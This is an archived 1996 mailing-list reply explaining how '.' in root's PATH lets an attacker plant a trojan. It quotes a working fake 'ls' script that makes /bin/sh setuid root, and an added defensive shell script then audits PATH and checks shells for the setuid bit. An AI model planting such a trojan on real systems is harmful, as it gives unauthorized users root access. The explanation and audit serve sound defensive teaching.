Date: Tue, 25 Jun 1996 00:27:00 -0700
From: "Michael L. VanLoon -- HeadCandy.com"
To: -Vince-
cc: Mark Murray, hackers@freebsd.org, security@freebsd.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of Mon, 24 Jun 96 23:32:55 -0700.

>> 2) The Cracker made a trojan script somewhere (usually exploiting
>> some admins (roots) who have "." in their path). This way he creates
>> a script that, when run as root, will make him a suid program.
>> After this he has you by the tender bits.

> Hmmm, doesn't everyone have . in their path, since all . does is allow
> someone to run stuff from the current directory...

Assume root has "." in its path. The hacker puts this little script in his
dir, maybe also in /tmp/; it's called "ls" (imagine the coincidence), and
it's executable by all:

    #!/bin/sh
    chown root /bin/sh > /dev/null 2>&1
    chmod u+s,a+x /bin/sh > /dev/null 2>&1
    ls $*

Then he sits back and waits for the sysadmin to come along and type "ls" in
one of those directories. Pop quiz: what is the result?

-----------------------------------------------------------------------------
Michael L. VanLoon                                 michaelv@HeadCandy.com
      --< Free your mind and your machine -- NetBSD free un*x >--
NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3,
    Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32...
NetBSD ports in progress: PICA, others...

Roll your own Internet access -- Seattle People's Internet cooperative.
If you're in the Seattle area, ask me how.
-----------------------------------------------------------------------------
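The two conditions the trojan above relies on, checked from the admin's side: an added example that is not part of the original mail, written as a POSIX sh script. It flags a "." or empty entry in a PATH value (an empty entry is searched as the current directory too), any relative entry, any world-writable directory on the path, and a setuid bit on a shell binary; function names and messages are this example's own.

```shell
#!/bin/sh
# Added example (not from the original mail): audit a PATH value for the
# weaknesses the "ls" trojan depends on, and check a binary for the setuid
# bit its chmod u+s leaves behind. Findings are printed one per line;
# each function returns 1 if it found anything and 0 if clean.

audit_path() {
    p="$1"
    rc=0
    # A leading, trailing or doubled colon is an empty entry, which the
    # shell searches as the current directory, exactly like an explicit ".".
    case "$p" in
        :*|*:|*::*) echo "PATH has an empty entry (searched as '.')"; rc=1 ;;
    esac
    old_ifs="$IFS"
    IFS=:
    for d in $p; do
        [ -z "$d" ] && continue           # already reported above
        case "$d" in
            /*) ;;                         # absolute entry: fine so far
            *)  echo "PATH has a relative entry: $d"; rc=1; continue ;;
        esac
        # World-writable directory: anyone can drop an "ls" there. The 9th
        # character of ls -ldL (-L follows symlinks such as /bin -> usr/bin)
        # is the "other" write bit. Entries that do not exist are skipped.
        if [ -d "$d" ] && [ "$(ls -ldL "$d" | cut -c9)" = "w" ]; then
            echo "PATH directory is world-writable: $d"; rc=1
        fi
    done
    IFS="$old_ifs"
    return $rc
}

# Report the setuid bit on a file (the trojan's goal is a setuid root /bin/sh).
check_suid() {
    if [ -u "$1" ]; then
        echo "setuid bit set on $1"
        return 1
    fi
    return 0
}

# Run against the caller's own environment; findings are printed above.
audit_path "$PATH" && echo "PATH: clean"
check_suid /bin/sh && echo "/bin/sh: not setuid"
```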